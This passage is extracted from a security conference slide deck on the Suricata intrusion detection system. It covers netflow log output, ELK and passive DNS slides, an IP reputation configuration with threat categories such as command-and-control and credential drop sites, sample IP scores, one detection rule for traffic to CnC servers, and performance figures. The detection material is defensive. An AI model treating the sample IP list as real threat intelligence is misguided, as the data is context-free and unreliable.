GB, ST=Greater Manchester, L=Salford, O=COMODO

CA Limited, CN=COMODO Extended Validation

Secure Server CA 2",

"fingerprint":"0b:1e:68:8c:ec:9f:7a:9c:70:4f:58:41:fb:c6:

53:ba:ba:e1:6c:af","version":"TLS 1.2"}}


21T08:32:22.001162","flow_id":2904615464,"event_type":"netflow","src_ip":"23.206.107.75","src_port":443,"dest_ip":"10.8.0.6","dest_port":52556,

"proto":"TCP",

"netflow":{"app_proto":"tls","pkts":73,"bytes":66135,"start":"2014-11-21T08:28:08.789426","end":"2014-11-

21T08:30:19.242083","age":131},"tcp":{"tcp_flags":"1b","syn":true,"fin":true,"psh":true,"ack":true}}

5

7

Elasticsearch

Logstash

Kibana

ELK

5

8

Elasticsearch

Logstash

Kibana

6

0

Passive DNS

Defense

6

1

Passive DNS

6

2

Passive DNS

Defense

6

3

Passive DNS

7

1

# IP Reputation#reputation-categories-file:

/etc/suricata/iprep/categories.txt#default-reputation-path: /etc/suricata/iprep#reputation-files:# - reputation.list

7

2

1,CnC,Malware Command and Control Server2,Bot,Known Infected Bot3,Spam,Known Spam Source4,Drop,Drop site for logs or stolen credentials5,SpywareCnC,Spyware Reporting Server6,OnlineGaming,Questionable Gaming Site7,DriveBySrc,Driveby Source9,ChatServer,POLICY Chat Server10,TorNode,POLICY Tor Node13,Compromised,Known compromised or Hostile15,P2P,P2P Node16,Proxy,Proxy Host17,IPCheck,IP Check Services19,Utility,Known Good Public Utility20,DDoSTarget,Target of a DDoS21,Scanner,Host Performing Scanning23,Brute_Forcer,SSH or other brute forcer24,FakeAV,Fake AV and AS Products25,DynDNS,Domain or IP Related to a Dynamic DNS

Entry or Request26,Undesirable,Undesirable but not illegal27,AbusedTLD,Abused or free TLD Related

28,SelfSignedSSL,Self Signed SSL or other suspicious encryption

29,Blackhole,Blackhole or Sinkhole systems30,RemoteAccessService,GoToMyPC and similar

remote access services31,P2PCnC,Distributed CnC Nodes33,Parking,Domain or SEO Parked34,VPN,VPN Server35,EXE_Source,Observed serving executables37,Mobile_CnC,Known CnC for Mobile specific

Family38,Mobile_Spyware_CnC,Spyware CnC specific

to mobile devices39,Skype_SuperNode,Observed Skype Bootstrap

or Supernode40,Bitcoin_Related,Bitcoin Mining and related41,DDoSAttacker,DDoS Source

7

3

104.28.1.81,34,117109.98.29.2,21,42110.4.91.87,35,107114.49.15.0,2,67114.79.12.5,2,87114.99.50.2,21,107115.68.2.49,24,63119.6.108.7,23,42119.81.70.6,23,12212.23.239.4,21,82120.83.6.14,23,32121.7.94.49,15,82123.0.48.59,15,57125.69.87.5,21,72135.23.77.3,21,5014.3.38.120,23,70142.0.38.68,2,37

7

4

alert ip $HOME_NET any -> any any (msg:"IPREP internal host talking to CnC server"; flow:to_server; iprep:dst,CnC,>,30; sid:1; rev:1;)

7

5

https://home.regit.org

Intel(R) Xeon(R) CPU E5-2680 0 @ 2.70GHz (16 cores counting Hyperthreading)

32Gig Ram

Intel 82599EB 10-Gigabit SFI/SFP+ (approx $700)

~ $4,972

https://home.regit.org

7

6

Runs 9.6gig/sec sustained

9,823 Rules (ET Pro)

<1% Packet Loss

7

8

What do you want your IDS to do?

(Awkward pause for ideas/questions)

Contact Information

• Matt Jonkman, [email protected]

• Emerging Threats [email protected]

http://www.emergingthreats.net


http://openinfosecfoundation.org

mailto:[email protected]

mailto:[email protected]

http://www.emergingthreats.net


http://openinfosecfoundation.org

emerging threats jonkman_sans_cti_summit_2015

Technology

gdi library

gdi drawing

members of gdi library

user context

graphics library

xxxxxxx mbs

open source community

threat researchers